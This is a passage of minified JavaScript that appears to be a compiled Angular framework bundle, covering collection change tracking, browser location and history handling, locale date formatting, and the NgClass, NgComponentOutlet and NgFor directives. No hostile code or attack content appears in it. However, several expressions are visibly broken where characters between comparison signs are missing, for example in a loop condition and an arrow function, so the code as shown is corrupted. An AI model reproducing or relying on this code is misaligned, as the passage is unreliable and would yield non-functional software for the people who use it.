this._addToRemovals(this._unlink(a))}_unlink(a){null!==this._linkedRecords&&this._linkedRecords.remove(a);const e=a._prev,i=a._next;return null===e?this._itHead=i:e._next=i,null===i?this._itTail=e:i._prev=e,a}_addToMoves(a,e){return a.previousIndex===e||(this._movesTail=null===this._movesTail?this._movesHead=a:this._movesTail._nextMoved=a),a}_addToRemovals(a){return null===this._unlinkedRecords&&(this._unlinkedRecords=new Q9),this._unlinkedRecords.put(a),a.currentIndex=null,a._nextRemoved=null,null===this._removalsTail?(this._removalsTail=this._removalsHead=a,a._prevRemoved=null):(a._prevRemoved=this._removalsTail,this._removalsTail=this._removalsTail._nextRemoved=a),a}_addIdentityChange(a,e){return a.item=e,this._identityChangesTail=null===this._identityChangesTail?this._identityChangesHead=a:this._identityChangesTail._nextIdentityChange=a,a}}class Ioe{constructor(a,e){this.item=a,this.trackById=e,this.currentIndex=null,this.previousIndex=null,this._nextPrevious=null,this._prev=null,this._next=null,this._prevDup=null,this._nextDup=null,this._prevRemoved=null,this._nextRemoved=null,this._nextAdded=null,this._nextMoved=null,this._nextIdentityChange=null}}class Roe{constructor(){this._head=null,this._tail=null}add(a){null===this._head?(this._head=this._tail=a,a._nextDup=null,a._prevDup=null):(this._tail._nextDup=a,a._prevDup=this._tail,a._nextDup=null,this._tail=a)}get(a,e){let i;for(i=this._head;null!==i;i=i._nextDup)if((null===e||e<=i.currentIndex)&&Object.is(i.trackById,a))return i;return null}remove(a){const e=a._prevDup,i=a._nextDup;return null===e?this._head=i:e._nextDup=i,null===i?this._tail=e:i._prevDup=e,null===this._head}}class Q9{constructor(){this.map=new Map}put(a){const e=a.trackById;let i=this.map.get(e);i||(i=new Roe,this.map.set(e,i)),i.add(a)}get(a,e){const n=this.map.get(a);return n?n.get(a,e):null}remove(a){const e=a.trackById;return this.map.get(e).remove(a)&&this.map.delete(e),a}get isEmpty(){return 0===this.map.size}clear(){this.map.clear()}}function $9(t,a,e){const i=t.previousIndex;if(null===i)return i;let n=0;return e&&i{if(e&&e.key===n)this._maybeAddToChanges(e,i),this._appendAfter=e,e=e._next;else{const r=this._getOrCreateRecordForKey(n,i);e=this._insertBeforeOrAppend(e,r)}}),e){e._prev&&(e._prev._next=null),this._removalsHead=e;for(let i=e;null!==i;i=i._nextRemoved)i===this._mapHead&&(this._mapHead=null),this._records.delete(i.key),i._nextRemoved=i._next,i.previousValue=i.currentValue,i.currentValue=null,i._prev=null,i._next=null}return this._changesTail&&(this._changesTail._nextChanged=null),this._additionsTail&&(this._additionsTail._nextAdded=null),this.isDirty}_insertBeforeOrAppend(a,e){if(a){const i=a._prev;return e._next=a,e._prev=i,a._prev=e,i&&(i._next=e),a===this._mapHead&&(this._mapHead=e),this._appendAfter=a,a}return this._appendAfter?(this._appendAfter._next=e,e._prev=this._appendAfter):this._mapHead=e,this._appendAfter=e,null}_getOrCreateRecordForKey(a,e){if(this._records.has(a)){const n=this._records.get(a);this._maybeAddToChanges(n,e);const r=n._prev,c=n._next;return r&&(r._next=c),c&&(c._prev=r),n._next=null,n._prev=null,n}const i=new koe(a);return this._records.set(a,i),i.currentValue=e,this._addToAdditions(i),i}_reset(){if(this.isDirty){let a;for(this._previousMapHead=this._mapHead,a=this._previousMapHead;null!==a;a=a._next)a._nextPrevious=a._next;for(a=this._changesHead;null!==a;a=a._nextChanged)a.previousValue=a.currentValue;for(a=this._additionsHead;null!=a;a=a._nextAdded)a.previousValue=a.currentValue;this._changesHead=this._changesTail=null,this._additionsHead=this._additionsTail=null,this._removalsHead=null}}_maybeAddToChanges(a,e){Object.is(e,a.currentValue)||(a.previousValue=a.currentValue,a.currentValue=e,this._addToChanges(a))}_addToAdditions(a){null===this._additionsHead?this._additionsHead=this._additionsTail=a:(this._additionsTail._nextAdded=a,this._additionsTail=a)}_addToChanges(a){null===this._changesHead?this._changesHead=this._changesTail=a:(this._changesTail._nextChanged=a,this._changesTail=a)}_forEach(a,e){a instanceof Map?a.forEach(e):Object.keys(a).forEach(i=>e(a[i],i))}}class koe{constructor(a){this.key=a,this.previousValue=null,this.currentValue=null,this._nextPrevious=null,this._next=null,this._prev=null,this._nextAdded=null,this._nextRemoved=null,this._nextChanged=null}}function X9(){return new yd([new j9])}let yd=(()=>{class t{constructor(e){this.factories=e}static create(e,i){if(null!=i){const n=i.factories.slice();e=e.concat(n)}return new t(e)}static extend(e){return{provide:t,useFactory:i=>t.create(e,i||X9()),deps:[[t,new Vc,new Cc]]}}find(e){const i=this.factories.find(n=>n.supports(e));if(null!=i)return i;throw new gi(901,!1)}}return t.\u0275prov=hi({token:t,providedIn:"root",factory:X9}),t})();function Y9(){return new f1([new K9])}let f1=(()=>{class t{constructor(e){this.factories=e}static create(e,i){if(i){const n=i.factories.slice();e=e.concat(n)}return new t(e)}static extend(e){return{provide:t,useFactory:i=>t.create(e,i||Y9()),deps:[[t,new Vc,new Cc]]}}find(e){const i=this.factories.find(n=>n.supports(e));if(i)return i;throw new gi(901,!1)}}return t.\u0275prov=hi({token:t,providedIn:"root",factory:Y9}),t})();const Noe=P9(null,"core",[]);let Loe=(()=>{class t{constructor(e){}}return t.\u0275fac=function(e){return new(e||t)(At(Yf))},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({}),t})();function Eh(t){return"boolean"==typeof t?t:null!=t&&"false"!==t}let Bv=null;function su(){return Bv}const ga=new ni("DocumentToken");let XD=(()=>{class t{historyGo(e){throw new Error("Not implemented")}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:function(){return function Voe(){return At(J9)}()},providedIn:"platform"}),t})();const Boe=new ni("Location Initialized");let J9=(()=>{class t extends XD{constructor(e){super(),this._doc=e,this._init()}_init(){this.location=window.location,this._history=window.history}getBaseHrefFromDOM(){return su().getBaseHref(this._doc)}onPopState(e){const i=su().getGlobalEventTarget(this._doc,"window");return i.addEventListener("popstate",e,!1),()=>i.removeEventListener("popstate",e)}onHashChange(e){const i=su().getGlobalEventTarget(this._doc,"window");return i.addEventListener("hashchange",e,!1),()=>i.removeEventListener("hashchange",e)}get href(){return this.location.href}get protocol(){return this.location.protocol}get hostname(){return this.location.hostname}get port(){return this.location.port}get pathname(){return this.location.pathname}get search(){return this.location.search}get hash(){return this.location.hash}set pathname(e){this.location.pathname=e}pushState(e,i,n){Z9()?this._history.pushState(e,i,n):this.location.hash=n}replaceState(e,i,n){Z9()?this._history.replaceState(e,i,n):this.location.hash=n}forward(){this._history.forward()}back(){this._history.back()}historyGo(e=0){this._history.go(e)}getState(){return this._history.state}}return t.\u0275fac=function(e){return new(e||t)(At(ga))},t.\u0275prov=hi({token:t,factory:function(){return function Hoe(){return new J9(At(ga))}()},providedIn:"platform"}),t})();function Z9(){return!!window.history.pushState}function YD(t,a){if(0==t.length)return a;if(0==a.length)return t;let e=0;return t.endsWith("/")&&e++,a.startsWith("/")&&e++,2==e?t+a.substring(1):1==e?t+a:t+"/"+a}function eP(t){const a=t.match(/#|\?|$/),e=a&&a.index||t.length;return t.slice(0,e-("/"===t[e-1]?1:0))+t.slice(e)}function Dh(t){return t&&"?"!==t[0]?"?"+t:t}let tg=(()=>{class t{historyGo(e){throw new Error("Not implemented")}}return t.\u0275fac=function(e){return new(e||t)},t.\u0275prov=hi({token:t,factory:function(){return Po(iP)},providedIn:"root"}),t})();const tP=new ni("appBaseHref");let iP=(()=>{class t extends tg{constructor(e,i){var n,r,c;super(),this._platformLocation=e,this._removeListenerFns=[],this._baseHref=null!==(c=null!==(n=null!=i?i:this._platformLocation.getBaseHrefFromDOM())&&void 0!==n?n:null===(r=Po(ga).location)||void 0===r?void 0:r.origin)&&void 0!==c?c:""}ngOnDestroy(){for(;this._removeListenerFns.length;)this._removeListenerFns.pop()()}onPopState(e){this._removeListenerFns.push(this._platformLocation.onPopState(e),this._platformLocation.onHashChange(e))}getBaseHref(){return this._baseHref}prepareExternalUrl(e){return YD(this._baseHref,e)}path(e=!1){const i=this._platformLocation.pathname+Dh(this._platformLocation.search),n=this._platformLocation.hash;return n&&e?`${i}${n}`:i}pushState(e,i,n,r){const c=this.prepareExternalUrl(n+Dh(r));this._platformLocation.pushState(e,i,c)}replaceState(e,i,n,r){const c=this.prepareExternalUrl(n+Dh(r));this._platformLocation.replaceState(e,i,c)}forward(){this._platformLocation.forward()}back(){this._platformLocation.back()}getState(){return this._platformLocation.getState()}historyGo(e=0){var i,n;null===(n=(i=this._platformLocation).historyGo)||void 0===n||n.call(i,e)}}return t.\u0275fac=function(e){return new(e||t)(At(XD),At(tP,8))},t.\u0275prov=hi({token:t,factory:t.\u0275fac,providedIn:"root"}),t})(),Uoe=(()=>{class t extends tg{constructor(e,i){super(),this._platformLocation=e,this._baseHref="",this._removeListenerFns=[],null!=i&&(this._baseHref=i)}ngOnDestroy(){for(;this._removeListenerFns.length;)this._removeListenerFns.pop()()}onPopState(e){this._removeListenerFns.push(this._platformLocation.onPopState(e),this._platformLocation.onHashChange(e))}getBaseHref(){return this._baseHref}path(e=!1){let i=this._platformLocation.hash;return null==i&&(i="#"),i.length>0?i.substring(1):i}prepareExternalUrl(e){const i=YD(this._baseHref,e);return i.length>0?"#"+i:i}pushState(e,i,n,r){let c=this.prepareExternalUrl(n+Dh(r));0==c.length&&(c=this._platformLocation.pathname),this._platformLocation.pushState(e,i,c)}replaceState(e,i,n,r){let c=this.prepareExternalUrl(n+Dh(r));0==c.length&&(c=this._platformLocation.pathname),this._platformLocation.replaceState(e,i,c)}forward(){this._platformLocation.forward()}back(){this._platformLocation.back()}getState(){return this._platformLocation.getState()}historyGo(e=0){var i,n;null===(n=(i=this._platformLocation).historyGo)||void 0===n||n.call(i,e)}}return t.\u0275fac=function(e){return new(e||t)(At(XD),At(tP,8))},t.\u0275prov=hi({token:t,factory:t.\u0275fac}),t})(),iy=(()=>{class t{constructor(e){this._subject=new Tt,this._urlChangeListeners=[],this._urlChangeSubscription=null,this._locationStrategy=e;const i=this._locationStrategy.getBaseHref();this._baseHref=eP(aP(i)),this._locationStrategy.onPopState(n=>{this._subject.emit({url:this.path(!0),pop:!0,state:n.state,type:n.type})})}ngOnDestroy(){var e;null===(e=this._urlChangeSubscription)||void 0===e||e.unsubscribe(),this._urlChangeListeners=[]}path(e=!1){return this.normalize(this._locationStrategy.path(e))}getState(){return this._locationStrategy.getState()}isCurrentPathEqualTo(e,i=""){return this.path()==this.normalize(e+Dh(i))}normalize(e){return t.stripTrailingSlash(function Goe(t,a){return t&&a.startsWith(t)?a.substring(t.length):a}(this._baseHref,aP(e)))}prepareExternalUrl(e){return e&&"/"!==e[0]&&(e="/"+e),this._locationStrategy.prepareExternalUrl(e)}go(e,i="",n=null){this._locationStrategy.pushState(n,"",e,i),this._notifyUrlChangeListeners(this.prepareExternalUrl(e+Dh(i)),n)}replaceState(e,i="",n=null){this._locationStrategy.replaceState(n,"",e,i),this._notifyUrlChangeListeners(this.prepareExternalUrl(e+Dh(i)),n)}forward(){this._locationStrategy.forward()}back(){this._locationStrategy.back()}historyGo(e=0){var i,n;null===(n=(i=this._locationStrategy).historyGo)||void 0===n||n.call(i,e)}onUrlChange(e){return this._urlChangeListeners.push(e),this._urlChangeSubscription||(this._urlChangeSubscription=this.subscribe(i=>{this._notifyUrlChangeListeners(i.url,i.state)})),()=>{var i;const n=this._urlChangeListeners.indexOf(e);this._urlChangeListeners.splice(n,1),0===this._urlChangeListeners.length&&(null===(i=this._urlChangeSubscription)||void 0===i||i.unsubscribe(),this._urlChangeSubscription=null)}}_notifyUrlChangeListeners(e="",i){this._urlChangeListeners.forEach(n=>n(e,i))}subscribe(e,i,n){return this._subject.subscribe({next:e,error:i,complete:n})}}return t.normalizeQueryParams=Dh,t.joinWithSlash=YD,t.stripTrailingSlash=eP,t.\u0275fac=function(e){return new(e||t)(At(tg))},t.\u0275prov=hi({token:t,factory:function(){return function qoe(){return new iy(At(tg))}()},providedIn:"root"}),t})();function aP(t){return t.replace(/\/index.html$/,"")}var Al=(()=>((Al=Al||{})[Al.Decimal=0]="Decimal",Al[Al.Percent=1]="Percent",Al[Al.Currency=2]="Currency",Al[Al.Scientific=3]="Scientific",Al))(),Zr=(()=>((Zr=Zr||{})[Zr.Format=0]="Format",Zr[Zr.Standalone=1]="Standalone",Zr))(),Zn=(()=>((Zn=Zn||{})[Zn.Narrow=0]="Narrow",Zn[Zn.Abbreviated=1]="Abbreviated",Zn[Zn.Wide=2]="Wide",Zn[Zn.Short=3]="Short",Zn))(),Pr=(()=>((Pr=Pr||{})[Pr.Short=0]="Short",Pr[Pr.Medium=1]="Medium",Pr[Pr.Long=2]="Long",Pr[Pr.Full=3]="Full",Pr))(),Ba=(()=>((Ba=Ba||{})[Ba.Decimal=0]="Decimal",Ba[Ba.Group=1]="Group",Ba[Ba.List=2]="List",Ba[Ba.PercentSign=3]="PercentSign",Ba[Ba.PlusSign=4]="PlusSign",Ba[Ba.MinusSign=5]="MinusSign",Ba[Ba.Exponential=6]="Exponential",Ba[Ba.SuperscriptingExponent=7]="SuperscriptingExponent",Ba[Ba.PerMille=8]="PerMille",Ba[Ba.Infinity=9]="Infinity",Ba[Ba.NaN=10]="NaN",Ba[Ba.TimeSeparator=11]="TimeSeparator",Ba[Ba.CurrencyDecimal=12]="CurrencyDecimal",Ba[Ba.CurrencyGroup=13]="CurrencyGroup",Ba))();function Hv(t,a){return Md(Xc(t)[Ji.DateFormat],a)}function Uv(t,a){return Md(Xc(t)[Ji.TimeFormat],a)}function qv(t,a){return Md(Xc(t)[Ji.DateTimeFormat],a)}function bd(t,a){const e=Xc(t),i=e[Ji.NumberSymbols][a];if(void 0===i){if(a===Ba.CurrencyDecimal)return e[Ji.NumberSymbols][Ba.Decimal];if(a===Ba.CurrencyGroup)return e[Ji.NumberSymbols][Ba.Group]}return i}function oP(t){if(!t[Ji.ExtraData])throw new Error(`Missing extra locale data for the locale "${t[Ji.LocaleId]}". Use "registerLocaleData" to load new data. See the "I18n guide" on angular.io to know more.`)}function Md(t,a){for(let e=a;e>-1;e--)if(void 0!==t[e])return t[e];throw new Error("Locale data API: locale data undefined")}function ZD(t){const[a,e]=t.split(":");return{hours:+a,minutes:+e}}const nre=/^(\d{4,})-?(\d\d)-?(\d\d)(?:T(\d\d)(?::?(\d\d)(?::?(\d\d)(?:\.(\d+))?)?)?(Z|([+-])(\d\d):?(\d\d))?)?$/,ay={},ore=/((?:[^BEGHLMOSWYZabcdhmswyz']+)|(?:'(?:[^']|'')*')|(?:G{1,5}|y{1,4}|Y{1,4}|M{1,5}|L{1,5}|w{1,2}|W{1}|d{1,2}|E{1,6}|c{1,6}|a{1,5}|b{1,5}|B{1,5}|h{1,2}|H{1,2}|m{1,2}|s{1,2}|S{1,3}|z{1,4}|Z{1,5}|O{1,4}))([\s\S]*)/;var Ns=(()=>((Ns=Ns||{})[Ns.Short=0]="Short",Ns[Ns.ShortGMT=1]="ShortGMT",Ns[Ns.Long=2]="Long",Ns[Ns.Extended=3]="Extended",Ns))(),Ga=(()=>((Ga=Ga||{})[Ga.FullYear=0]="FullYear",Ga[Ga.Month=1]="Month",Ga[Ga.Date=2]="Date",Ga[Ga.Hours=3]="Hours",Ga[Ga.Minutes=4]="Minutes",Ga[Ga.Seconds=5]="Seconds",Ga[Ga.FractionalSeconds=6]="FractionalSeconds",Ga[Ga.Day=7]="Day",Ga))(),Tn=(()=>((Tn=Tn||{})[Tn.DayPeriods=0]="DayPeriods",Tn[Tn.Days=1]="Days",Tn[Tn.Months=2]="Months",Tn[Tn.Eras=3]="Eras",Tn))();function e6(t,a,e,i){let n=function fre(t){if(cP(t))return t;if("number"==typeof t&&!isNaN(t))return new Date(t);if("string"==typeof t){if(t=t.trim(),/^(\d{4}(-\d{1,2}(-\d{1,2})?)?)$/.test(t)){const[n,r=1,c=1]=t.split("-").map(d=>+d);return Gv(n,r-1,c)}const e=parseFloat(t);if(!isNaN(t-e))return new Date(e);let i;if(i=t.match(nre))return function pre(t){const a=new Date(0);let e=0,i=0;const n=t[8]?a.setUTCFullYear:a.setFullYear,r=t[8]?a.setUTCHours:a.setHours;t[9]&&(e=Number(t[9]+t[10]),i=Number(t[9]+t[11])),n.call(a,Number(t[1]),Number(t[2])-1,Number(t[3]));const c=Number(t[4]||0)-e,d=Number(t[5]||0)-i,T=Number(t[6]||0),k=Math.floor(1e3*parseFloat("0."+(t[7]||0)));return r.call(a,c,d,T,k),a}(i)}const a=new Date(t);if(!cP(a))throw new Error(`Unable to convert "${t}" into a date`);return a}(t);a=xh(e,a)||a;let d,c=[];for(;a;){if(d=ore.exec(a),!d){c.push(a);break}{c=c.concat(d.slice(1));const q=c.pop();if(!q)break;a=q}}let T=n.getTimezoneOffset();i&&(T=sP(i,T),n=function hre(t,a,e){const i=e?-1:1,n=t.getTimezoneOffset();return function ure(t,a){return(t=new Date(t.getTime())).setMinutes(t.getMinutes()+a),t}(t,i*(sP(a,n)-n))}(n,i,!0));let k="";return c.forEach(q=>{const Y=function mre(t){if(a6[t])return a6[t];let a;switch(t){case"G":case"GG":case"GGG":a=pr(Tn.Eras,Zn.Abbreviated);break;case"GGGG":a=pr(Tn.Eras,Zn.Wide);break;case"GGGGG":a=pr(Tn.Eras,Zn.Narrow);break;case"y":a=Cs(Ga.FullYear,1,0,!1,!0);break;case"yy":a=Cs(Ga.FullYear,2,0,!0,!0);break;case"yyy":a=Cs(Ga.FullYear,3,0,!1,!0);break;case"yyyy":a=Cs(Ga.FullYear,4,0,!1,!0);break;case"Y":a=Kv(1);break;case"YY":a=Kv(2,!0);break;case"YYY":a=Kv(3);break;case"YYYY":a=Kv(4);break;case"M":case"L":a=Cs(Ga.Month,1,1);break;case"MM":case"LL":a=Cs(Ga.Month,2,1);break;case"MMM":a=pr(Tn.Months,Zn.Abbreviated);break;case"MMMM":a=pr(Tn.Months,Zn.Wide);break;case"MMMMM":a=pr(Tn.Months,Zn.Narrow);break;case"LLL":a=pr(Tn.Months,Zn.Abbreviated,Zr.Standalone);break;case"LLLL":a=pr(Tn.Months,Zn.Wide,Zr.Standalone);break;case"LLLLL":a=pr(Tn.Months,Zn.Narrow,Zr.Standalone);break;case"w":a=t6(1);break;case"ww":a=t6(2);break;case"W":a=t6(1,!0);break;case"d":a=Cs(Ga.Date,1);break;case"dd":a=Cs(Ga.Date,2);break;case"c":case"cc":a=Cs(Ga.Day,1);break;case"ccc":a=pr(Tn.Days,Zn.Abbreviated,Zr.Standalone);break;case"cccc":a=pr(Tn.Days,Zn.Wide,Zr.Standalone);break;case"ccccc":a=pr(Tn.Days,Zn.Narrow,Zr.Standalone);break;case"cccccc":a=pr(Tn.Days,Zn.Short,Zr.Standalone);break;case"E":case"EE":case"EEE":a=pr(Tn.Days,Zn.Abbreviated);break;case"EEEE":a=pr(Tn.Days,Zn.Wide);break;case"EEEEE":a=pr(Tn.Days,Zn.Narrow);break;case"EEEEEE":a=pr(Tn.Days,Zn.Short);break;case"a":case"aa":case"aaa":a=pr(Tn.DayPeriods,Zn.Abbreviated);break;case"aaaa":a=pr(Tn.DayPeriods,Zn.Wide);break;case"aaaaa":a=pr(Tn.DayPeriods,Zn.Narrow);break;case"b":case"bb":case"bbb":a=pr(Tn.DayPeriods,Zn.Abbreviated,Zr.Standalone,!0);break;case"bbbb":a=pr(Tn.DayPeriods,Zn.Wide,Zr.Standalone,!0);break;case"bbbbb":a=pr(Tn.DayPeriods,Zn.Narrow,Zr.Standalone,!0);break;case"B":case"BB":case"BBB":a=pr(Tn.DayPeriods,Zn.Abbreviated,Zr.Format,!0);break;case"BBBB":a=pr(Tn.DayPeriods,Zn.Wide,Zr.Format,!0);break;case"BBBBB":a=pr(Tn.DayPeriods,Zn.Narrow,Zr.Format,!0);break;case"h":a=Cs(Ga.Hours,1,-12);break;case"hh":a=Cs(Ga.Hours,2,-12);break;case"H":a=Cs(Ga.Hours,1);break;case"HH":a=Cs(Ga.Hours,2);break;case"m":a=Cs(Ga.Minutes,1);break;case"mm":a=Cs(Ga.Minutes,2);break;case"s":a=Cs(Ga.Seconds,1);break;case"ss":a=Cs(Ga.Seconds,2);break;case"S":a=Cs(Ga.FractionalSeconds,1);break;case"SS":a=Cs(Ga.FractionalSeconds,2);break;case"SSS":a=Cs(Ga.FractionalSeconds,3);break;case"Z":case"ZZ":case"ZZZ":a=Qv(Ns.Short);break;case"ZZZZZ":a=Qv(Ns.Extended);break;case"O":case"OO":case"OOO":case"z":case"zz":case"zzz":a=Qv(Ns.ShortGMT);break;case"OOOO":case"ZZZZ":case"zzzz":a=Qv(Ns.Long);break;default:return null}return a6[t]=a,a}(q);k+=Y?Y(n,e,T):"''"===q?"'":q.replace(/(^'|'$)/g,"").replace(/''/g,"'")}),k}function Gv(t,a,e){const i=new Date(0);return i.setFullYear(t,a,e),i.setHours(0,0,0),i}function xh(t,a){const e=function joe(t){return Xc(t)[Ji.LocaleId]}(t);if(ay[e]=ay[e]||{},ay[e][a])return ay[e][a];let i="";switch(a){case"shortDate":i=Hv(t,Pr.Short);break;case"mediumDate":i=Hv(t,Pr.Medium);break;case"longDate":i=Hv(t,Pr.Long);break;case"fullDate":i=Hv(t,Pr.Full);break;case"shortTime":i=Uv(t,Pr.Short);break;case"mediumTime":i=Uv(t,Pr.Medium);break;case"longTime":i=Uv(t,Pr.Long);break;case"fullTime":i=Uv(t,Pr.Full);break;case"short":const n=xh(t,"shortTime"),r=xh(t,"shortDate");i=jv(qv(t,Pr.Short),[n,r]);break;case"medium":const c=xh(t,"mediumTime"),d=xh(t,"mediumDate");i=jv(qv(t,Pr.Medium),[c,d]);break;case"long":const T=xh(t,"longTime"),k=xh(t,"longDate");i=jv(qv(t,Pr.Long),[T,k]);break;case"full":const q=xh(t,"fullTime"),Y=xh(t,"fullDate");i=jv(qv(t,Pr.Full),[q,Y])}return i&&(ay[e][a]=i),i}function jv(t,a){return a&&(t=t.replace(/\{([^}]+)}/g,function(e,i){return null!=a&&i in a?a[i]:e})),t}function um(t,a,e="-",i,n){let r="";(t<0||n&&t<=0)&&(n?t=1-t:(t=-t,r=e));let c=String(t);for(;c.length0||d>-e)&&(d+=e),t===Ga.Hours)0===d&&-12===e&&(d=12);else if(t===Ga.FractionalSeconds)return function rre(t,a){return um(t,3).substring(0,a)}(d,a);const T=bd(c,Ba.MinusSign);return um(d,a,T,i,n)}}function pr(t,a,e=Zr.Format,i=!1){return function(n,r){return function cre(t,a,e,i,n,r){switch(e){case Tn.Months:return function Koe(t,a,e){const i=Xc(t),r=Md([i[Ji.MonthsFormat],i[Ji.MonthsStandalone]],a);return Md(r,e)}(a,n,i)[t.getMonth()];case Tn.Days:return function $oe(t,a,e){const i=Xc(t),r=Md([i[Ji.DaysFormat],i[Ji.DaysStandalone]],a);return Md(r,e)}(a,n,i)[t.getDay()];case Tn.DayPeriods:const c=t.getHours(),d=t.getMinutes();if(r){const k=function Zoe(t){const a=Xc(t);return oP(a),(a[Ji.ExtraData][2]||[]).map(i=>"string"==typeof i?ZD(i):[ZD(i[0]),ZD(i[1])])}(a),q=function ere(t,a,e){const i=Xc(t);oP(i);const r=Md([i[Ji.ExtraData][0],i[Ji.ExtraData][1]],a)||[];return Md(r,e)||[]}(a,n,i),Y=k.findIndex(te=>{if(Array.isArray(te)){const[pe,Re]=te,Fe=c>=pe.hours&&d>=pe.minutes,Ne=c0?Math.floor(n/60):Math.ceil(n/60);switch(t){case Ns.Short:return(n>=0?"+":"")+um(c,2,r)+um(Math.abs(n%60),2,r);case Ns.ShortGMT:return"GMT"+(n>=0?"+":"")+um(c,1,r);case Ns.Long:return"GMT"+(n>=0?"+":"")+um(c,2,r)+":"+um(Math.abs(n%60),2,r);case Ns.Extended:return 0===i?"Z":(n>=0?"+":"")+um(c,2,r)+":"+um(Math.abs(n%60),2,r);default:throw new Error(`Unknown zone width "${t}"`)}}}function rP(t){return Gv(t.getFullYear(),t.getMonth(),t.getDate()+(4-t.getDay()))}function t6(t,a=!1){return function(e,i){let n;if(a){const r=new Date(e.getFullYear(),e.getMonth(),1).getDay()-1,c=e.getDate();n=1+Math.floor((c+r)/7)}else{const r=rP(e),c=function dre(t){const a=Gv(t,0,1).getDay();return Gv(t,0,1+(a<=4?4:11)-a)}(r.getFullYear()),d=r.getTime()-c.getTime();n=1+Math.round(d/6048e5)}return um(n,t,bd(i,Ba.MinusSign))}}function Kv(t,a=!1){return function(e,i){return um(rP(e).getFullYear(),t,bd(i,Ba.MinusSign),a)}}const a6={};function sP(t,a){t=t.replace(/:/g,"");const e=Date.parse("Jan 01, 1970 00:00:00 "+t)/6e4;return isNaN(e)?a:e}function cP(t){return t instanceof Date&&!isNaN(t.valueOf())}const _re=/^(\d+)?\.((\d+)(-(\d+))?)?$/;function s6(t){const a=parseInt(t);if(isNaN(a))throw new Error("Invalid integer literal when parsing "+t);return a}function uP(t,a){a=encodeURIComponent(a);for(const e of t.split(";")){const i=e.indexOf("="),[n,r]=-1==i?[e,""]:[e.slice(0,i),e.slice(i+1)];if(n.trim()===a)return decodeURIComponent(r)}return null}let ig=(()=>{class t{constructor(e,i,n,r){this._iterableDiffers=e,this._keyValueDiffers=i,this._ngEl=n,this._renderer=r,this._iterableDiffer=null,this._keyValueDiffer=null,this._initialClasses=[],this._rawClass=null}set klass(e){this._removeClasses(this._initialClasses),this._initialClasses="string"==typeof e?e.split(/\s+/):[],this._applyClasses(this._initialClasses),this._applyClasses(this._rawClass)}set ngClass(e){this._removeClasses(this._rawClass),this._applyClasses(this._initialClasses),this._iterableDiffer=null,this._keyValueDiffer=null,this._rawClass="string"==typeof e?e.split(/\s+/):e,this._rawClass&&(HC(this._rawClass)?this._iterableDiffer=this._iterableDiffers.find(this._rawClass).create():this._keyValueDiffer=this._keyValueDiffers.find(this._rawClass).create())}ngDoCheck(){if(this._iterableDiffer){const e=this._iterableDiffer.diff(this._rawClass);e&&this._applyIterableChanges(e)}else if(this._keyValueDiffer){const e=this._keyValueDiffer.diff(this._rawClass);e&&this._applyKeyValueChanges(e)}}_applyKeyValueChanges(e){e.forEachAddedItem(i=>this._toggleClass(i.key,i.currentValue)),e.forEachChangedItem(i=>this._toggleClass(i.key,i.currentValue)),e.forEachRemovedItem(i=>{i.previousValue&&this._toggleClass(i.key,!1)})}_applyIterableChanges(e){e.forEachAddedItem(i=>{if("string"!=typeof i.item)throw new Error(`NgClass can only toggle CSS classes expressed as strings, got ${Wo(i.item)}`);this._toggleClass(i.item,!0)}),e.forEachRemovedItem(i=>this._toggleClass(i.item,!1))}_applyClasses(e){e&&(Array.isArray(e)||e instanceof Set?e.forEach(i=>this._toggleClass(i,!0)):Object.keys(e).forEach(i=>this._toggleClass(i,!!e[i])))}_removeClasses(e){e&&(Array.isArray(e)||e instanceof Set?e.forEach(i=>this._toggleClass(i,!1)):Object.keys(e).forEach(i=>this._toggleClass(i,!1)))}_toggleClass(e,i){(e=e.trim())&&e.split(/\s+/g).forEach(n=>{i?this._renderer.addClass(this._ngEl.nativeElement,n):this._renderer.removeClass(this._ngEl.nativeElement,n)})}}return t.\u0275fac=function(e){return new(e||t)(Ee(yd),Ee(f1),Ee(mi),Ee(wr))},t.\u0275dir=Ot({type:t,selectors:[["","ngClass",""]],inputs:{klass:["class","klass"],ngClass:"ngClass"},standalone:!0}),t})(),hP=(()=>{class t{constructor(e){this._viewContainerRef=e,this.ngComponentOutlet=null}ngOnChanges(e){const{_viewContainerRef:i,ngComponentOutletNgModule:n,ngComponentOutletNgModuleFactory:r}=this;if(i.clear(),this._componentRef=void 0,this.ngComponentOutlet){const c=this.ngComponentOutletInjector||i.parentInjector;(e.ngComponentOutletNgModule||e.ngComponentOutletNgModuleFactory)&&(this._moduleRef&&this._moduleRef.destroy(),this._moduleRef=n?function Zae(t,a){return new Nk(t,null!=a?a:null)}(n,fP(c)):r?r.create(fP(c)):void 0),this._componentRef=i.createComponent(this.ngComponentOutlet,{index:i.length,injector:c,ngModuleRef:this._moduleRef,projectableNodes:this.ngComponentOutletContent})}}ngOnDestroy(){this._moduleRef&&this._moduleRef.destroy()}}return t.\u0275fac=function(e){return new(e||t)(Ee(fo))},t.\u0275dir=Ot({type:t,selectors:[["","ngComponentOutlet",""]],inputs:{ngComponentOutlet:"ngComponentOutlet",ngComponentOutletInjector:"ngComponentOutletInjector",ngComponentOutletContent:"ngComponentOutletContent",ngComponentOutletNgModule:"ngComponentOutletNgModule",ngComponentOutletNgModuleFactory:"ngComponentOutletNgModuleFactory"},standalone:!0,features:[sa]}),t})();function fP(t){return t.get(Z_).injector}class wre{constructor(a,e,i,n){this.$implicit=a,this.ngForOf=e,this.index=i,this.count=n}get first(){return 0===this.index}get last(){return this.index===this.count-1}get even(){return this.index%2==0}get odd(){return!this.even}}let Zi=(()=>{class t{constructor(e,i,n){this._viewContainer=e,this._template=i,this._differs=n,this._ngForOf=null,this._ngForOfDirty=!0,this._differ=null}set ngForOf(e){this._ngForOf=e,this._ngForOfDirty=!0}set ngForTrackBy(e){this._trackByFn=e}get ngForTrackBy(){return this._trackByFn}set ngForTemplate(e){e&&(this._template=e)}ngDoCheck(){if(this._ngForOfDirty){this._ngForOfDirty=!1;const e=this._ngForOf;!this._differ&&e&&(this._differ=this._differs.find(e).create(this.ngForTrackBy))}if(this._differ){const e=this._differ.diff(this._ngForOf);e&&this._applyChanges(e)}}_applyChanges(e){const i=this._viewContainer;e.forEachOperation((n,r,c)=>{if(null==n.previousIndex)i.createEmbeddedView(this._template,new wre(n.item,this._ngForOf,-1,-1),null===c?void 0:c);else if(null==c)i.remove(null===r?void 0:r);else if(null!==r){const d=i.get(r);i.move(d,c),_P(d,n)}});for(let n=0,r=i.length;n{_P(i.get(n.currentIndex),n)})}static ngTemplateContextGuard(e,i){return!0}}return 